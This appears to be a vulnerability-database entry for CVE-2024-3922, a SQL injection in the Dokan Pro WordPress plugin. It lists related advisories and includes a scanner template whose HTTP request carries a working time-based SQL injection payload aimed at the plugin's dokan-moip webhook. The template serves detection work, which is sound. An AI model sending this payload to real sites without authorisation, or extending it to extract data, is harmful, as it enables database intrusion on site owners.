| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2024-3922 | 5 Jul 202405:08 | – | circl | |
| WordPress plugin Dokan Pro security vulnerability | 13 Jun 202400:00 | – | cnnvd | |
| CVE-2024-3922 | 13 Jun 202402:05 | – | cve | |
| CVE-2024-3922 Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection | 13 Jun 202402:05 | – | cvelist | |
| CVE-2024-3922 | 13 Jun 202402:15 | – | nvd | |
| WordPress Dokan Pro Plugin <= 3.10.3 is vulnerable to SQL Injection | 11 Jun 202400:00 | – | patchstack | |
| Wordpress Dokan Pro plugin <= 3.10.3 - Unauthenticated SQL Injection vulnerability | 11 Jun 202416:25 | – | patchstack | |
| CVE-2024-3922 | 5 Feb 202509:53 | – | redhatcve | |
| CVE-2024-3922 Dokan Pro <= 3.10.3 - Unauthenticated SQL Injection | 13 Jun 202402:05 | – | vulnrichment | |
| Wordfence Intelligence Weekly WordPress Vulnerability Report (June 10, 2024 to June 16, 2024) | 20 Jun 202413:40 | – | wordfence |
id: CVE-2024-3922
info:
name: Dokan Pro <= 3.10.3 - SQL Injection
author: s4e-io
severity: critical
description: |
The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.
impact: |
Unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: |
Fixed in 3.11.0
reference:
- https://dokan.co/docs/wordpress/changelog/
- https://nvd.nist.gov/vuln/detail/CVE-2024-3922
classification:
epss-score: 0.56209
epss-percentile: 0.98929
cpe: cpe:2.3:a:wedevs:dokan:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 2
vendor: wedevs
product: dokan
publicwww-query: "/wp-content/plugins/dokan-pro/"
tags: time-based-sqli,cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- "Dokan product"
internal: true
- raw:
- |
@timeout: 20s
POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1
Host: {{Hostname}}
{"env":"1","event":"invoice.created","resource":{"subscription_code":"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='"}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- "status_code == 302"
condition: and
# digest: 4b0a00483046022100c3e55baf5edddf7d6e832393e065312c39432883ea7c52ddb1cb5fd5f4e69dce022100a7132d1390149e7522e782089e301fefb7b3e565a32376cbbfc3c5d731ab04d1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation